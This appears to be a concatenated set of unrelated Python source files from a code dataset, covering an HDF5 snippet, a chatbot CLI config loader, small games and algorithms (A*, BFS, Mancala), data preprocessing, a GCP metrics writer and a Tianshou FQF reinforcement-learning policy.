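    f["type_tag"] = "kpoints_mesh"
    f["mesh"] = np.array([4, 4, 4])
    f["offset"] = np.array([0.0, 0.0, 0.5])

with h5py.File("kpoints.h5", "r") as f:
    tag = f["type_tag"][()]   # reads back as bytes in h5py 3.x; .value is deprecated
    if tag in (b"kpoints_mesh", "kpoints_mesh"):
        print(f["mesh"][()], f["offset"][()])
```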
print_function\nfrom __future__ import absolute_import\nimport fnmatch, os\nfrom meya_cli.path_utils import has_hidden_component\nMEYA_CONFIG_FILE = 'meya-config.yaml'\nREST_API_VERSION = '1.0.0'\nUSER_AGENT_STRING = 'meya-cli'\nDEFAULT_API_ROOT = 'https://api.meya.ai/'\nDEFAULT_WATCH_COMMAND_DELAY = 2\nDEFAULT_AUTO_SYNC_FILES = ('cms/*.yaml', 'cms/*.csv', 'flows/*.yaml', 'components/*.py',\n 'components/*.js', 'intents.yaml', 'requirements.txt')\n\nclass MeyaConfig(object):\n\n def __init__(self, root_dir, api_key, bot_id, api_root=None, ignore_files=[], ignore_dot_files=True, autosync_files=DEFAULT_AUTO_SYNC_FILES, verbose=False, watch_command_delay=DEFAULT_WATCH_COMMAND_DELAY):\n assert isinstance(ignore_files, list)\n for ignore_pattern in ignore_files:\n assert isinstance(ignore_pattern, (str, unicode))\n\n self.root_dir = root_dir\n self.api_key = api_key\n self.api_root = api_root or DEFAULT_API_ROOT\n self.bot_id = bot_id\n self.ignore_files = ignore_files\n self.ignore_dot_files = ignore_dot_files\n self.autosync_files = autosync_files\n self.verbose = verbose\n self.watch_command_delay = watch_command_delay\n\n def should_ignore_path(self, path):\n meya_path = os.path.relpath(path, start=self.root_dir)\n rel_path = os.path.relpath(path)\n for ignore_pattern in self.ignore_files:\n if fnmatch.fnmatch(meya_path, ignore_pattern):\n print('SKIPPING ' + rel_path + \" due to 'ignore_files' rule '\" + ignore_pattern + \"'.\")\n return True\n\n if meya_path.startswith('..'):\n print('SKIPPING ' + rel_path + '; outside of project folder.')\n return True\n if self.ignore_dot_files and has_hidden_component(meya_path):\n if self.verbose:\n print('SKIPPING ' + rel_path + '; ignoring hidden (dot prefix) files.')\n return True\n return False\n\n def should_upload_path(self, path):\n meya_path = os.path.relpath(path, start=self.root_dir)\n rel_path = os.path.relpath(path)\n if self.should_ignore_path(path):\n return False\n if meya_path == MEYA_CONFIG_FILE:\n print('SKIPPING ' + rel_path + '; not uploading local config file.')\n return False\n if not os.path.isfile(path):\n if not os.path.exists(path):\n print('SKIPPING ' + rel_path + '; no local copy found.')\n else:\n print('SKIPPING ' + rel_path + '; not a regular file.')\n return False\n return True\n\n def path_matches_autosync_patterns(self, path):\n meya_path = os.path.relpath(path, start=self.root_dir)\n for autosync_pattern in self.autosync_files:\n if fnmatch.fnmatch(meya_path, autosync_pattern):\n return True\n\n return False\n\n\ndef parse_meya_config(root_dir, local_path):\n import poyo\n with open(local_path, 'r') as (f):\n definition = poyo.parse_string(f.read())\n api_key = definition['api_key']\n bot_id = definition.get('bot_id')\n api_root = definition.get('api_root', DEFAULT_API_ROOT)\n ignore_files = definition.get('ignore_files', [])\n ignore_dot_files = definition.get('ignore_dot_files', True)\n autosync_files = definition.get('autosync_files', DEFAULT_AUTO_SYNC_FILES)\n verbose = definition.get('verbose', False)\n watch_command_delay = definition.get('watch_command_delay', DEFAULT_WATCH_COMMAND_DELAY)\n return MeyaConfig(root_dir, api_key, bot_id, api_root, ignore_files, ignore_dot_files, autosync_files, verbose, watch_command_delay)\n\n\ndef find_meya_config(start_path):\n \"\"\"\n Traverse path up parent directories until a directory\n with MEYA_CONFIG_FILE is found.\n \"\"\"\n root_dir = start_path\n try:\n while True:\n local_path = os.path.join(root_dir, MEYA_CONFIG_FILE)\n if os.path.isfile(local_path):\n return 
parse_meya_config(root_dir, local_path)\n new_root = os.path.dirname(root_dir)\n if new_root == root_dir:\n break\n root_dir = new_root\n\n except IOError:\n pass\n\n return","sub_path":"pycfiles/meya_cli-1.0.6-py2.7/meya_config.py","file_name":"meya_config.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"76494368","text":"import random\r\nnumber = random.randint(1, 9)\r\nchanceCount = 0\r\nwhile (chanceCount < 5):\r\n introString = int(input(\"enter the number between 1-9: \"))\r\n if (introString > number):\r\n print(\"Your guess is too large\")\r\n elif (introString == number):\r\n print(\"Congratulation! You guessed it correct\")\r\n else :\r\n print(\"Your number guess is too less\")\r\n chanceCount = chanceCount + 1\r\nif (chanceCount > 5):\r\n print(\"You are out of chances\")","sub_path":"number.py","file_name":"number.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"261601461","text":"from pelican import Pelican\nimport pelican.settings\n\nimport os\n\nsettings = pelican.settings.DEFAULT_CONFIG\n\nfor i in ['PATH', 'OUTPUT_PATH', 'THEME', 'SITEURL']:\n del settings[i]\n\nsettings.update({\n u'THEME_STATIC_DIR':'theme',\n u'AUTHOR': '',\n u'SITENAME': 'Open Science Collaboration Blog',\n u'TIMEZONE': 'America/New_York',\n u'LINKS': (\n ),\n u'SOCIAL' : (\n ),\n})\n\nsettings['ARTICLE_URL'] = '{date:%Y}/{date:%m}/{date:%d}/{slug}/'\nsettings['ARTICLE_SAVE_AS'] = '{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'\nsettings['DISQUS_SITENAME'] = 'opensciencecollaboration'\n\n\ndef generate(settings, input_path=None, output_path=None, theme_path=None, siteurl=None ):\n settings['PATH'] = input_path\n settings['OUTPUT_PATH'] = output_path\n settings['THEME'] = theme_path\n settings['SITEURL'] = siteurl\n settings['STATIC_PATHS'] = ['images', 'static']\n\n\n if settings['SITEURL'].endswith('/'):\n settings['SITEURL'] = settings['SITEURL'][:-1]\n\n if not os.path.exists(settings['OUTPUT_PATH']):\n os.mkdir(settings['OUTPUT_PATH'])\n\n settings = pelican.settings.configure_settings(settings)\n Pelican(settings).run()\n\ngenerate(\n settings,\n input_path='site/content',\n output_path='output/',\n theme_path='pelican-mockingbird/',\n siteurl='http://osc.centerforopenscience.org'\n)\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"329201325","text":"import numpy as np\nimport datetime\nimport heapq\n\nclass NodeInfo:\n\n def __init__(self, node_id, parent_id, start_id, goal_id, planning_env, action):\n self.node_id = node_id\n self.parent_id = parent_id\n self.start_id = start_id\n self.goal_id = goal_id\n self.action = action\n self.planning_env = planning_env\n self.node_config = planning_env.discrete_env.NodeIdToConfiguration(node_id)\n\n self.hops2start = 0\n self.dist2goal = self.computeDist(node_id, goal_id)\n \n def computeDist(self, node1, node2):\n return self.planning_env.ComputeDistance(node1, node2)\n \n def computeHeuristic(self):\n return self.hops2start + 3*self.dist2goal\n\n def updateParent(self, parent_id, hops2start, action):\n self.parent_id = parent_id\n self.hops2start = hops2start\n self.action = action\n\nclass AStarPlanner(object):\n\n def __init__(self, planning_env, visualize):\n self.planning_env = planning_env\n 
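find_meya_config above climbs parent directories until it either finds meya-config.yaml or reaches the filesystem root, detected when os.path.dirname stops changing the path. The same walk in isolation, with the file name as a parameter:

```python
import os

def find_upwards(start_path, filename="meya-config.yaml"):
    """Return the first directory at or above start_path containing filename."""
    root_dir = os.path.abspath(start_path)
    while True:
        if os.path.isfile(os.path.join(root_dir, filename)):
            return root_dir
        new_root = os.path.dirname(root_dir)
        if new_root == root_dir:   # reached "/" (or a drive root): give up
            return None
        root_dir = new_root

print(find_upwards(os.getcwd()))
```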
self.visualize = visualize\n self.nodes = dict()\n self.log_flag = True\n\n def log(self, txt, flag=True):\n if self.log_flag and flag:\n print(txt)\n\n def plotEdge(self, src_id, dst_id):\n src_coord = self.planning_env.discrete_env.NodeIdToConfiguration(src_id)\n dst_coord = self.planning_env.discrete_env.NodeIdToConfiguration(dst_id)\n if self.visualize:\n self.planning_env.PlotEdge(src_coord, dst_coord)\n\n def dumpHeap(self, lst):\n self.log(lst)\n\n def Plan(self, start_config, goal_config):\n\n start = datetime.datetime.now() \n\n if self.visualize and hasattr(self.planning_env, 'InitializePlot'):\n self.planning_env.InitializePlot(goal_config)\n\n start_id = self.planning_env.discrete_env.ConfigurationToNodeId(start_config)\n goal_id = self.planning_env.discrete_env.ConfigurationToNodeId(goal_config)\n\n self.log(('A* planning ... \\n Start State ... %s \\n Start ID ... %s \\n Goal State ... %s \\n Goal ID ... %s \\n') % (start_config, start_id, goal_config, goal_id))\n open_set = [(self.planning_env.ComputeDistance(start_id, goal_id), start_id)]\n closed_set = set([])\n\n closest_dist2goal = self.planning_env.ComputeDistance(start_id, goal_id)\n closest_node = start_id\n self.log('Closest dist to goal : ' + str(closest_dist2goal))\n\n node_info = {start_id: NodeInfo(0, None, 0, goal_id, self.planning_env, None)}\n heapq.heapify(open_set)\n \n while (len(open_set) > 0):\n self.log('\\nCurr queue ' + str(open_set), False)\n\n (t, node_id) = heapq.heappop(open_set)\n if node_id in closed_set:\n continue\n\n dist2goal = self.planning_env.ComputeDistance(node_id, goal_id)\n if dist2goal < closest_dist2goal:\n closest_dist2goal, closest_node = dist2goal, node_id\n\n if (node_id != start_id):\n closed_set.add(node_id)\n node_config = self.planning_env.discrete_env.NodeIdToConfiguration(node_id)\n self.log('Node ID ' + str(node_id) + ' Dist to goal : '+ str(node_info[node_id].dist2goal))\n self.plotEdge(node_info[node_id].parent_id, node_id)\n\n if (node_id == goal_id):\n self.log('Goal found')\n break\n\n successors = self.planning_env.GetSuccessors(node_id)\n\n if len(successors) != 0: \n for [succ_id, action] in successors:\n self.log('Successor ' + str(succ_id), False)\n if succ_id not in closed_set:\n if succ_id in node_info: \n self.log('Successor visited ' + str(succ_id), False)\n if node_info[succ_id].hops2start > node_info[node_id].hops2start+1:\n node_info[succ_id].updateParent(node_id, node_info[node_id].hops2start+1, action)\n else: \n # Successor seen for the first time.\n node_info[succ_id] = NodeInfo(succ_id, node_id, start_id, goal_id, self.planning_env, action)\n self.log('Adding successor %s .. dist2goal : %s config: %s' %(succ_id, node_info[succ_id].dist2goal, node_info[succ_id].node_config), False)\n heapq.heappush(open_set, (node_info[succ_id].computeHeuristic(), succ_id))\n else:\n self.log('Successor in closed set : %s' % (succ_id), False)\n else:\n self.log(('No successors for %s'% (node_id)), False)\n \n\n plan = []\n if goal_id == start_id:\n return np.array(plan)\n\n if (goal_id not in node_info):\n self.log ('Goal not reached ! 
Cannot plan path')\n else:\n path = [node_info[goal_id]]\n while path[-1].parent_id != start_id:\n path.append(node_info[path[-1].parent_id])\n \n plan = path[::-1]\n elapsed = (datetime.datetime.now() - start).seconds\n self.log(('Plan length : %s') % (len(plan)))\n self.log(('Nodes visited: %s') % (len(node_info)))\n self.log(('Elapsed time: %s') % elapsed)\n\n if self.visualize and hasattr(self.planning_env, 'InitializePlot'):\n self.planning_env.InitializePlot(goal_config)\n [self.planning_env.PlotEdge(plan[i-1].action.footprint[-1], plan[i].action.footprint[-1]) for i in range(1,len(plan))]\n\n actions = [item.action for item in plan]\n return np.array(actions)\n","sub_path":"code/AStarPlanner.py","file_name":"AStarPlanner.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"317955791","text":"import connection_strings\nimport psycopg2\nimport sys\n\n\ndef db_connect(func):\n\tdef connect(*args, **kwargs):\n\t\ttry:\n\t\t\tconn = psycopg2.connect(database = connection_strings.cl_database, \n\t\t\t\t\t\t\t\t\tuser = connection_strings.cl_user, \n\t\t\t\t\t\t\t\t\tpassword = connection_strings.cl_password)\n\t\t\t\n\t\t\tretval = func(conn, *args, **kwargs)\n\n\t\texcept psycopg2.DatabaseError as e:\n\t\t\tprint('Error %s' % e)\n\t\t\tsys.exit(1)\n\t\t\n\t\treturn retval\n\n\tdb_connect.__name__ = func.__name__\n\tdb_connect.__doc__ = func.__doc__\n\treturn connect\n\n\n@db_connect\ndef dbtransaction(conn, func):\n\t\"\"\"Wraps function in a SQL transaction.\"\"\"\n\tdef db_query(*args, **kwargs):\n\t\tcursor = conn.cursor()\n\n\t\ttry:\n\t\t\tcursor.execute(\"BEGIN\")\n\t\t\tretval = func(cursor, *args, **kwargs)\n\t\t\tcursor.execute(\"COMMIT\")\n\n\t\texcept:\n\t\t\tcursor.execute(\"ROLLBACK\")\n\t\t\traise\n\n\t\tfinally:\n\t\t\tcursor.close()\n\t\t\tprint(\"cursor closed\\n\")\n\n\t\treturn retval\n\n\treturn db_query","sub_path":"db_conn.py","file_name":"db_conn.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"452111416","text":"import sys\nimport csv\nimport math\nimport copy\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nfrom copy import deepcopy\nimport heapq\nimport signal\nfrom sklearn import svm\n\nnumEntries = -1\nnumFeatures = -1\n\n# features = [[x1, x2, ...], [y1, y2, ...], ...]\nfeatures = []\nfeatureSums = []\nfeatureMeans = []\nfeatureStdDevs = []\nclasses = []\n\nTP = 0\nTN = 0\nFP = 0\nFN = 0\n\n# Calculates and print precision, recall, f-measure, and accuracy\ndef print_stats():\n print(\"TP: \" + str(TP))\n print(\"TN: \" + str(TN))\n print(\"FP: \" + str(FP))\n print(\"FN: \" + str(FN))\n precision = TP/float(TP+FP)\n recall = TP/float(TP+FN)\n f_measure = 2*precision*recall/float(precision+recall)\n accuracy = (TP+TN)/float(TP+TN+FP+FN)\n print(\"precision: \" + str(precision))\n print(\"recall: \" + str(recall))\n print(\"f-measure: \" + str(f_measure))\n print(\"accuracy: \" + str(accuracy))\n\n# Handles control-c\ndef signal_handler(signal, frame):\n print_stats()\n sys.exit(0)\n\ndef L1Dist(p1, p2):\n if len(p1) is not len(p2):\n raise ValueError('Points must have the same dimentionality')\n sum = 0\n for i in range(len(p1)):\n sum += abs(p1[i] - p2[i])\n return sum\n\n# Read the data from csv\nwith open('spambase.data', 'rt') as csvFile:\n csvReader = csv.reader(csvFile)\n for row in csvReader:\n # Ignore the first labels row\n if numEntries 
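The planner above never deletes stale heap entries: it pushes a fresh (priority, node) tuple whenever a node improves and simply skips popped nodes that are already in closed_set. That lazy-deletion idiom in a tiny grid A*, independent of the planning_env machinery:

```python
import heapq

def astar(grid, start, goal):
    """grid: list of strings, '#' blocked; returns shortest path length or None."""
    h = lambda p: abs(p[0] - goal[0]) + abs(p[1] - goal[1])   # Manhattan heuristic
    open_set = [(h(start), 0, start)]
    best_g = {start: 0}
    closed = set()
    while open_set:
        _, g, node = heapq.heappop(open_set)
        if node in closed:          # stale entry: lazy deletion
            continue
        closed.add(node)
        if node == goal:
            return g
        r, c = node
        for nr, nc in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):
            if 0 <= nr < len(grid) and 0 <= nc < len(grid[0]) and grid[nr][nc] != '#':
                if g + 1 < best_g.get((nr, nc), float('inf')):
                    best_g[(nr, nc)] = g + 1
                    heapq.heappush(open_set, (g + 1 + h((nr, nc)), g + 1, (nr, nc)))
    return None

print(astar(["....", ".##.", "...."], (0, 0), (2, 3)))   # 5
```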
== -1:\n numEntries = 0\n continue\n\n numEntries = numEntries+1\n if numFeatures == -1:\n numFeatures = len(row)-1\n features = [[] for i in range(numFeatures)]\n featureSums = [0]*numFeatures\n featureMeans = [0]*numFeatures\n featureStdDevs = [0]*numFeatures\n\n i = 0\n for item in row:\n item = float(item)\n if i != len(row)-1:\n featureSums[i] += item\n features[i].append(item)\n else:\n classes.append(int(item))\n i = i+1\n# Compute the mean and standard deviation\nfor i in range(numFeatures):\n featureMeans[i] = featureSums[i]/numEntries\n sum = 0.0\n for item in features[i]:\n sum += (item-featureMeans[i])**2\n average = sum/numEntries\n featureStdDevs[i] = math.sqrt(average)\n\n# Standardize the data\nfeaturesStd = copy.deepcopy(features)\nfor i in range(numFeatures):\n for j in range(numEntries):\n featuresStd[i][j] = (features[i][j]-featureMeans[i])/featureStdDevs[i]\n\nnumEntriesTrain = int(math.floor(numEntries * (2.0/3.0)))\nnumEntriesTest = int(math.ceil(numEntries * (1.0/3.0)))\n\nfeaturesTest = [[] for i in features]\nfeaturesStdTest = [[] for i in features]\n\nrandom.seed(0)\n\n# Randomize the data and select training and testing data\nindex_shuf = list(range(numEntries-1))\nrandom.shuffle(index_shuf)\nfor j in range(len(featuresStd)):\n featuresStdTest[j] = [featuresStd[j][i] for i in index_shuf[numEntriesTrain:]]\n featuresTest[j] = [features[j][i] for i in index_shuf[numEntriesTrain:]]\n featuresStd[j] = [featuresStd[j][i] for i in index_shuf[:numEntriesTrain]]\n features[j] = [features[j][i] for i in index_shuf[:numEntriesTrain]]\n\n# Randomize and separate the training data\nclassesTest = [classes[i] for i in index_shuf[numEntriesTrain:]]\nclasses = [classes[i] for i in index_shuf[:numEntriesTrain]]\n\n# Transpose the data\n\nfeaturesStd = np.asarray(featuresStd).T.tolist()\nfeatures = np.asarray(features).T.tolist()\nfeaturesStdTest = np.asarray(featuresStdTest).T.tolist()\nfeaturesTest = np.asarray(featuresTest).T.tolist()\nsizes = [len(featuresStd[0]), 20, 1]\n\n\nfor featureIdx in range(len(featuresStd)):\n print(','.join(str(x) for x in featuresStd[featureIdx]))\n print(classes[featureIdx])\nprint(\"done\")\n\nfor featureIdx in range(len(featuresStdTest)):\n print(','.join(str(x) for x in featuresStdTest[featureIdx]))\n print(classesTest[featureIdx])\nprint(\"done\")\n","sub_path":"nn_single.py","file_name":"nn_single.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"311485071","text":"import numpy as np\n\n\nnp.random.seed(0)\n\ninput_data = np.array([\n [0, 0],\n [0, 1],\n [1, 0],\n [1, 1],\n])\ntarget_data = np.array([\n [1],\n [0],\n [0],\n [1],\n])\n\n# import matplotlib.pyplot as plt\n\n# plt.style.use('ggplot')\n# plt.scatter(*input_data.T, c = target_data, s = 100)\n# plt.show()\n\nfrom neupy import algorithms\n\nbpnet = algorithms.Backpropagation(\n (2, 4, 1),\n step = 0.1, \n verbose = True,\n show_epoch = '4 times',\n)\n\nbpnet.train(input_data, target_data, epochs = 5000)\n# bpnet.plot_errors()\n\npredicted = bpnet.predict(input_data)\n# print(predicted)\nprint(predicted.round())","sub_path":"test/quick_start.py","file_name":"quick_start.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"351630145","text":"import uuid\n\nimport pandas as pd\nfrom sqlalchemy import Column, ARRAY, Integer, ForeignKey\nfrom sqlalchemy.dialects.postgresql import UUID\nfrom 
sqlalchemy.orm import relationship\nfrom sqlalchemy.orm.attributes import flag_modified\n\nfrom mancala.base import Base\n\npits_pairs = {0: 11, 1: 10, 2: 9, 3: 8, 4: 7, 5: 6}\n\n\nclass Board(Base):\n __tablename__ = \"boards\"\n\n id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, unique=True, nullable=False)\n pits = Column(ARRAY(Integer))\n stores = Column(ARRAY(Integer))\n game_id = Column(UUID(as_uuid=True), ForeignKey('games.id'))\n\n game = relationship(\"Game\", back_populates=\"board\")\n\n def __init__(self):\n self.pits = [4] * 12\n self.stores = [0] * 2\n # self.pits_pairs = {0: 11,\n # 1: 10,\n # 2: 9,\n # 3: 8,\n # 4: 7,\n # 5: 6}\n\n def get_store_stones(self, store_num):\n return self.stores[store_num - 1]\n\n def get_pit_stones(self, pit_num):\n return self.pits[pit_num]\n\n def all_pits_empty(self):\n for pit in self.pits:\n if pit != 0:\n return False\n return True\n\n def remove_from_pit(self, pit_num):\n in_pit = self.pits[pit_num]\n self.pits[pit_num] = 0\n flag_modified(self, 'pits')\n return in_pit\n\n def add_to_pit(self, pit_num):\n self.pits[pit_num] += 1\n flag_modified(self, 'pits')\n\n def add_to_store(self, player_store):\n self.stores[player_store-1] += 1\n flag_modified(self, 'stores')\n\n @staticmethod\n def print_board(board, player_1, player_2):\n player_1_arr = board.pits[:6]\n player_1_arr.append(board.stores[0])\n player_1_arr = [' '] + player_1_arr\n\n player_2_arr = [board.stores[1]]\n pits_reverse = board.pits[6:]\n pits_reverse.reverse()\n player_2_arr += pits_reverse\n player_2_arr += [' ']\n\n columns_names = {x: 'pit' for x in range(1,7)}\n df = pd.DataFrame({player_2: player_2_arr, player_1: player_1_arr})\n df = df.transpose()\n df = df.rename(columns={0: 'store', 7: 'store'})\n df = df.rename(columns=columns_names)\n print(df)\n","sub_path":"mancala/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"103857553","text":"import os\nimport time\nimport uuid\nimport threading\n\nfrom google.api import metric_pb2 as ga_metric\nfrom google.cloud import monitoring_v3\n\nPROJECT_ID = os.environ[\"PROJECT_ID\"]\n#UNIQUE_ID = str(uuid.uuid4())\nCUSTOM_METRIC_NAME_PREFIX = \"pets_requests_\"\nCUSTOM_METRIC_DISPLAY_NAME = \"PETS_REQUESTS\"\n\ndef create_metric_descriptor(project_id):\n try:\n client = monitoring_v3.MetricServiceClient()\n #list_metric_descriptors(project_id)\n project_name = f\"projects/{project_id}\"\n descriptor = ga_metric.MetricDescriptor()\n descriptor.type = \"custom.googleapis.com/\" + CUSTOM_METRIC_NAME_PREFIX + PROJECT_ID\n descriptor.display_name = CUSTOM_METRIC_DISPLAY_NAME\n descriptor.metric_kind = ga_metric.MetricDescriptor.MetricKind.GAUGE\n descriptor.value_type = ga_metric.MetricDescriptor.ValueType.INT64\n descriptor.unit = \"1\"\n descriptor.description = \"This measures the amount of pets requested so far.\"\n descriptor = client.create_metric_descriptor(\n name=project_name, metric_descriptor=descriptor\n )\n print(\"Created\", descriptor.type)\n except Exception as e:\n print(e)\n \ndef list_metric_descriptors(project_id):\n # [START monitoring_list_descriptors]\n client = monitoring_v3.MetricServiceClient()\n project_name = f\"projects/{project_id}\"\n for descriptor in client.list_metric_descriptors(name=project_name):\n if \"custom\" in str(descriptor.type):\n print(descriptor.type)\n client.delete_metric_descriptor(name=descriptor.name)\n # [END 
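MetricsWriter above is a daemon thread that wakes on a fixed interval and pushes the current counter to Cloud Monitoring. The same skeleton with the GCP call swapped for a print so the threading pattern runs stand-alone (interval shortened for the demo):

```python
import threading
import time

class MetricsWriter(threading.Thread):
    def __init__(self, interval=1.0):
        super().__init__(daemon=True)   # daemon: the thread dies with the main thread
        self.interval = interval
        self.value = 0

    def update_value(self, val):
        self.value = val

    def run(self):
        while True:
            if self.value != 0:
                print("would write metric:", self.value)  # stand-in for the API call
            time.sleep(self.interval)

writer = MetricsWriter()
writer.start()
for i in range(1, 4):
    writer.update_value(i)
    time.sleep(1.2)
```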
monitoring_list_descriptors]\n\ndef write_time_series(project_id,requested_pets):\n client = monitoring_v3.MetricServiceClient()\n project_name = f\"projects/{project_id}\"\n\n series = monitoring_v3.TimeSeries()\n series.metric.type = \"custom.googleapis.com/\" + CUSTOM_METRIC_NAME_PREFIX + PROJECT_ID\n series.resource.type = \"gae_instance\"\n series.resource.labels[\"instance_id\"] = os.environ[\"GAE_INSTANCE\"]\n series.resource.labels[\"location\"] = \"us-east1\"\n series.resource.labels[\"module_id\"] = os.environ[\"GAE_APPLICATION\"]\n series.resource.labels[\"version_id\"] = os.environ[\"GAE_VERSION\"]\n \n now = time.time()\n seconds = int(now)\n nanos = int((now - seconds) * 10 ** 9)\n interval = monitoring_v3.TimeInterval(\n {\"end_time\": {\"seconds\": seconds, \"nanos\": nanos}}\n )\n point = monitoring_v3.Point({\"interval\": interval, \"value\": {\"int64_value\": requested_pets}})\n series.points = [point]\n client.create_time_series(name=project_name, time_series=[series])\n\n\n\nclass MetricsWriter(threading.Thread):\n\n def __init__(self, value):\n threading.Thread.__init__(self)\n self.time_series_writer = write_time_series\n self.daemon = True\n self.value = value\n self.project_id = PROJECT_ID\n \n\n def run(self):\n while True:\n try:\n if self.value != 0:\n self.time_series_writer(self.project_id, self.value)\n print(\"Wrote current value:\", self.value)\n time.sleep(10)\n except Exception as e:\n print(\"Unable to update metric\", e)\n pass\n \n def update_value(self, val):\n self.value = val\n\n","sub_path":"ch6/app-monitoring-custom-metric/custom_metric.py","file_name":"custom_metric.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"432341684","text":"\"\"\"\n@file 네트워크.py\n@brief DFS/BFS - Level 3\n@desc \nSimilar to the 'Population Movement' problem (the way it counts the number of unions) - seems like a subproblem of it\n\n\"\"\"\nfrom collections import deque\n\n\ndef bfs(visited, computers, start):\n q = deque([start])\n visited[start] = True\n\n while q:\n now = q.popleft()\n for i in range(len(computers[now])):\n if i != now and computers[now][i] == 1 and not visited[i]:\n visited[i] = True\n q.append(i)\n\n\ndef solution(n, computers):\n visited = [False] * n\n nNet = 0\n for i in range(n):\n if not visited[i]:\n bfs(visited, computers, i)\n nNet += 1\n\n return nNet\n","sub_path":"Programmers/네트워크.py","file_name":"네트워크.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"321862196","text":"from typing import Any, Optional, Union, cast\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom tianshou.data import Batch, ReplayBuffer, to_numpy\nfrom tianshou.data.types import FQFBatchProtocol, RolloutBatchProtocol\nfrom tianshou.policy import DQNPolicy, QRDQNPolicy\nfrom tianshou.utils.net.discrete import FractionProposalNetwork, FullQuantileFunction\n\n\nclass FQFPolicy(QRDQNPolicy):\n \"\"\"Implementation of Fully-parameterized Quantile Function. arXiv:1911.02140.\n\n :param torch.nn.Module model: a model following the rules in\n :class:`~tianshou.policy.BasePolicy`. 
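solution in the record above counts connected components by launching a BFS from every not-yet-visited node. A quick worked run of the same logic on a small three-computer adjacency matrix (values invented for the example):

```python
from collections import deque

def count_networks(n, computers):
    visited = [False] * n
    nets = 0
    for i in range(n):
        if not visited[i]:
            nets += 1                     # new component found
            q = deque([i])
            visited[i] = True
            while q:
                now = q.popleft()
                for j in range(n):
                    if j != now and computers[now][j] == 1 and not visited[j]:
                        visited[j] = True
                        q.append(j)
    return nets

# computers[i][j] == 1 means machines i and j are wired together
print(count_networks(3, [[1, 1, 0], [1, 1, 0], [0, 0, 1]]))   # 2
```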
(s -> logits)\n :param torch.optim.Optimizer optim: a torch.optim for optimizing the model.\n :param FractionProposalNetwork fraction_model: a FractionProposalNetwork for\n proposing fractions/quantiles given state.\n :param torch.optim.Optimizer fraction_optim: a torch.optim for optimizing\n the fraction model above.\n :param float discount_factor: in [0, 1].\n :param int num_fractions: the number of fractions to use. Default to 32.\n :param float ent_coef: the coefficient for entropy loss. Default to 0.\n :param int estimation_step: the number of steps to look ahead. Default to 1.\n :param int target_update_freq: the target network update frequency (0 if\n you do not use the target network).\n :param bool reward_normalization: normalize the reward to Normal(0, 1).\n Default to False.\n :param lr_scheduler: a learning rate scheduler that adjusts the learning rate in\n optimizer in each policy.update(). Default to None (no lr_scheduler).\n\n .. seealso::\n\n Please refer to :class:`~tianshou.policy.QRDQNPolicy` for more detailed\n explanation.\n \"\"\"\n\n def __init__(\n self,\n model: FullQuantileFunction,\n optim: torch.optim.Optimizer,\n fraction_model: FractionProposalNetwork,\n fraction_optim: torch.optim.Optimizer,\n discount_factor: float = 0.99,\n num_fractions: int = 32,\n ent_coef: float = 0.0,\n estimation_step: int = 1,\n target_update_freq: int = 0,\n reward_normalization: bool = False,\n **kwargs: Any,\n ) -> None:\n super().__init__(\n model,\n optim,\n discount_factor,\n num_fractions,\n estimation_step,\n target_update_freq,\n reward_normalization,\n **kwargs,\n )\n self.propose_model = fraction_model\n self._ent_coef = ent_coef\n self._fraction_optim = fraction_optim\n\n def _target_q(self, buffer: ReplayBuffer, indices: np.ndarray) -> torch.Tensor:\n batch = buffer[indices] # batch.obs_next: s_{t+n}\n if self._target:\n result = self(batch, input=\"obs_next\")\n act, fractions = result.act, result.fractions\n next_dist = self(batch, model=\"model_old\", input=\"obs_next\", fractions=fractions).logits\n else:\n next_batch = self(batch, input=\"obs_next\")\n act = next_batch.act\n next_dist = next_batch.logits\n return next_dist[np.arange(len(act)), act, :]\n\n # TODO: add protocol type for return, fix Liskov substitution principle violation\n def forward( # type: ignore\n self,\n batch: RolloutBatchProtocol,\n state: Optional[Union[dict, Batch, np.ndarray]] = None,\n model: str = \"model\",\n input: str = \"obs\",\n fractions: Optional[Batch] = None,\n **kwargs: Any,\n ) -> FQFBatchProtocol:\n model = getattr(self, model)\n obs = batch[input]\n obs_next = obs.obs if hasattr(obs, \"obs\") else obs\n if fractions is None:\n (logits, fractions, quantiles_tau), hidden = model(\n obs_next,\n propose_model=self.propose_model,\n state=state,\n info=batch.info,\n )\n else:\n (logits, _, quantiles_tau), hidden = model(\n obs_next,\n propose_model=self.propose_model,\n fractions=fractions,\n state=state,\n info=batch.info,\n )\n weighted_logits = (fractions.taus[:, 1:] - fractions.taus[:, :-1]).unsqueeze(1) * logits\n q = DQNPolicy.compute_q_value(self, weighted_logits.sum(2), getattr(obs, \"mask\", None))\n if not hasattr(self, \"max_action_num\"):\n self.max_action_num = q.shape[1]\n act = to_numpy(q.max(dim=1)[1])\n result = Batch(\n logits=logits,\n act=act,\n state=hidden,\n fractions=fractions,\n quantiles_tau=quantiles_tau,\n )\n return 